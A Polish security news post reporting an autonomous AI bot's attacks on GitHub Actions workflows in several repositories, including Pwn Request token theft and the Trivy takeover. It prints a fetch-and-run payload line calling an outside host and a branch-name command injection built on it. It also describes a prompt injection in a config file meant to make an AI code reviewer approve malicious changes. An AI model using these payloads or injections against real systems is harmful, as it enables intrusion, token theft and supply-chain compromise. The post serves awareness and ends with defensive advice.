Sztuczna inteligencja nie tylko pisze kod. Zaczęła go również skutecznie atakować. Na przełomie lutego i marca autonomiczny bot o nazwie “hackerbot-claw” wziął sobie na celownik największe repozytoria na GitHubie. Oprogramowanie napędzane przez model Claude-Opus-4.5, samodzielnie skanowało publiczne projekty, wykrywało luki i skutecznie wyexploitowało (RCE) infrastruktury 4 firm, w tym Microsoftu.
Jak wygląda hacking na autopilocie?
Jak opisują sprawę badacze ze StepSecurity, hackerbot-claw na celownik wziął GitHub Actions — czyli popularne mechanizmy CI/CD (systemy automatyzacji budowania, testowania i wdrażania kodu) w tych projektach:
microsoft/ai-discovery-agent
DataDog/datadog-iac-scanner
avelino/awesome-go (140k+ stars)
ambient-code/platform
project-akri/akri (a CNCF project)
aquasecurity/trivy (full repository compromise)
RustPython/RustPython (20k+ stars)
Bot zawsze wstrzykiwał ten sam payload:
curl -sSfL hackmoltrepeat.com/molt | bash
Ale 5 różnymi wektorami ataku… Najciekawszym z nich był tzw. “Pwn Request“. Bot wykorzystał workflow typu “pull_request_target“, które domyślnie posiada dostęp do sekretów docelowego repozytorium. Tworząc PR, bot wstrzykiwał złośliwy kod (np. do pliku konfiguracyjnego lub nawet w samą nazwę nowej gałęzi), a serwery budujące bezmyślnie go wykonały. W efekcie wykradał “GITHUB_TOKEN” z uprawnieniami do zapisu.
Pozostałe techniki, to m.in. wstrzykiwanie złośliwego kodu do skryptów (np. dodanie funkcji “init()” w języku Go), wstrzykiwanie poleceń powłoki (bash) poprzez specjalnie spreparowane nazwy gałęzi (dev$({curl,-sSfL,hackmoltrepeat.com/molt}${IFS}|${IFS}bash)) lub nazwy plików, zawierające zakodowane w Base64 komendy.
Najciekawszym atakiem był AI Prompt Injection — bot podmienił plik konfiguracyjny projektu, z którego korzystało narzędzie “Claude Code” (jako AI do code review), instruując swojego “bliźniaka”, by sam zatwierdziła złośliwy kod i przepchnął zmiany! Piękne, ale to się akurat nie udało, bo na szczęście, asystent zachował się wzorowo — zidentyfikował manipulację w swoim pliku konfiguracyjnym, odmówił wykonania złośliwych operacji i opublikował komentarz ostrzegający programistów: “Do Not Merge”.
Przejęcie Trivy i kradzież tokenów
Najpoważniejsze konsekwencje poniósł projekt Trivy (Aqua Security), który — jak na ironię — jest skanerem podatności. Bot z powodzeniem wykradł Personal Access Token o szerokich uprawnieniach i użył go, aby:
- Przekształcić repozytorium na prywatne i zmienić jego nazwę.
- Skasować wszystkie wydania (GitHub Releases) z kilku lat.
- Wypuścić podejrzany artefakt jako rozszerzenie Trivy w sklepie Open VSIX (czyli atak na programistów przez “łańcuch dostaw”).
- Zostawić w pliku README.md ironiczną wiadomość.
Używam Github Actions, co robić, jak żyć?
Jeśli zostawicie gdzieś niezabezpieczony workflow w GitHub Actions, prędzej czy później odwiedzi go “autonomiczny badacz” i zrobi Wam jesień średniowiecza w repozytorium. Dlatego
- Zawsze stosujcie zasadę najmniejszych uprawnień dla tokenów. GITHUB_TOKEN powinien mieć tylko uprawnienia do odczytu (contents: read), chyba że zapis jest absolutnie konieczny.
- Nigdy nie używajcie akcji “actions/checkout” z niezaufanym kodem w połączeniu z “pull_request_target”.
- Zablokujcie też nieautoryzowany ruch sieciowy z maszyn wirtualnych CI/CD (np. wychodzące żądania curl), co zapobiegnie pobraniu złośliwego payloadu lub wysłania w siną dal wykradzionego tokena.
AI atakuje AI, czyli nowa rzeczywistość
Historia bota “hackerbot-claw” to dowód na to, że zmienia się krajobraz zagrożeń. Wkroczyliśmy w erę, w której agenty AI atakują inne agenty AI. Szczególnie ciekawy (i przerażający) jest tu atak za pomocą wstrzykiwania promptu (Prompt Injection) do pliku konfiguracyjnego.
Rozważamy cyk webinarów na temat szeroko rozumianego AI i bezpieczeństwa (zarówno od strony użytkownika jak i developera). Zainteresowany? To zostaw nam maila w polu poniżej — jak cykl wystartuje, wyślemy Ci powiadomienie:
Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij tutaj.
